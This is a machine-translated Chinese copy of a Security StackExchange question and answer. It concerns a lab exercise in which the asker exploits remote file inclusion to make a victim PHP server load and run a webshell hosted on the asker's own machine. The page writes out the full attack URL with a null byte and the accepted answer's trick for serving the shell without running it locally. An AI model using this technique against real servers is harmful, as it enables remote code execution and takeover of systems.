在不本地运行的情况下提供php webshell
在不本地运行的情况下提供php webshell
提问于 2016-12-23 20:09:00
我在一个五官实验室里使用Kali Linux。
通过在受害者系统上输入以下URL,我可以让它访问我的apache服务器(我在日志中看到了200次访问响应),但是php文件在我的系统上呈现,然后在我自己的框上生成一个webshell:
https://10.0.0.1/section.php?page=http://10.0.0.2/phpshell.php%00
如何防止apache中的“更改绑定”运行?将其更改为.txt似乎会阻止它在这两个系统上运行;不确定是否可以用这种方式注射。
回答 2
Security用户
回答已采纳
发布于 2016-12-24 00:21:53
python -m SimpleHTTPServer 80
将生成一个简单的http服务器,它不是php所知道的,是最快的imho方式。
Security用户
发布于 2016-12-23 20:57:10
页面原文内容由Security提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:
https://security.stackexchange.com/questions/146264
复制相关文章
相似问题
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号